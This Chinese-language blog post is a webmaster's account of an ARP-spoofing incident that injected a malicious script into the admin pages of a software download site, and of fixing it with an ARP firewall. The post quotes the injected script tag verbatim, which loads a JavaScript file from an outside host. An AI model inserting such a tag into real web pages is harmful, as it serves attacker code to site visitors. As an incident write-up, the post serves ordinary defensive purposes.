9月绿色软件联盟被ARP攻击经过与解决方法

提示：本次挂马对用户没有侵害。本站所有的页面为HTML格式。。。挂马只针对的是ASP格式。

发这篇文章上来。只是教大家方法。。另外也声明一下。。感谢大家的支持！！！！！

从9月开始登陆www.ouyaoxiazai.com出现断续问题。刚开始还有没当回事。以为是网络问题。但是近几天几乎晕掉。经常掉线。网速超慢无比。特别严重的是。《后台被挂马》！维护站的时候。一打开后台。卡巴 360 等 5个杀毒软件。全部报毒。。。。我想。晕了。被挂马了。怎么会呢？咱又没得罪什么人。我想大哥们也不会和我这个小弟开玩笑。但是的确！的确是有木马。是JS调用。

代码如下：<script language="javascript" type="text/javascript"src="http://test.whatthisdown.com/ad.js"></script>

我找到相关页子。改掉吧。。可是打开源代码后。发现没有挂马迹象。。怎么回事？？莫非是我本机中毒了？应该不可能啊。5个杀毒顶着应该不会有病毒进的来。把本机杀了一上午。没杀出个毒来。后来就要抓包了。发现问题总是《时有时无》。。。挂马的话应该不会变机器人的。变来变去的。
<html>
<head>
<title>管理员登陆</title>

木马出现ASP页面的《<html>》上面。。。这是什么问题呢？页子没问题。。应该出在本机或者网络传输的问题。本机已经杀了N次毒了。应该是网络问题了。。检查服务器。。依然干净。。

翻阅资料。。。。。。。。原来是ARP。。。原来是网段中的一台机器被入侵。。疯狂的在向我们站伪造arp包。。其中使用了N多方法。。都不行。。最后使用ARP防火墙解决了问题。

ARP防火墙下载地址：http://www.ouyaoxiazai.com/soft/aqxg/77/1890.html

提示：2003服务器NTFS安装此软件会出现运行不了的问题。。请使用下面这个附件修复！即可！

fixit.exe

修复后就可以使用了。。具体自己设置一下。。

最后提示那些挂马的大哥们：我们做站都不容易的。都是一步一步的爬。。好难。。。请您给我们这些小弟一次机会。谢谢。。在这里祝福同样在努力做站的你！加油吧！兄弟姐妹们。